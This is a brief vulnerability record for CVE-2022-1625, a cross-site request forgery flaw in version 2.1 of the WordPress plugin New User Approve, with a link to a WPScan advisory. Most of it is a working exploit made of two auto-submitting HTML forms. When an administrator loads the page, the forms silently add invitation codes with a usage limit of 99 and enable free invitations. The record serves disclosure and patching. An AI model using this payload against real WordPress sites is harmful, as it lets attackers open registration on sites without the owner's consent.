CVE: CVE-2022-1625

Name: New User Approve (new-user-approve)

Version: 2.1

Date: 2022-04-16 18:22:39

Advisory: https://wpscan.com/vulnerability/e1693318-900c-47f1-bb77-008b0d33327f

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/admin.php?page=nua-invitation-code" method="POST">
    <textarea name="nua_manual_add[codes]">test
sesame-open
let-me-in
</textarea>
    <input type="text" name="nua_manual_add[usage_limit]" value="99">
    <input type="text" name="nua_manual_add[expiry_date]" value="2022-04-30">
    <input type="text" name="nua_manual_add[submit]" value="Save Changes">
</form>
<script>
    document.forms[0].submit();
</script>


<form action="https://example.com/wp-admin/admin.php?page=nua-invitation-code&action=Settings" method="POST">
    <input type="text" name="nua_free_invitation" value="enable">
    <input type="text" name="nua_inv_code_submit" value="Save Changes">
</form>
<script>
    document.forms[0].submit();
</script>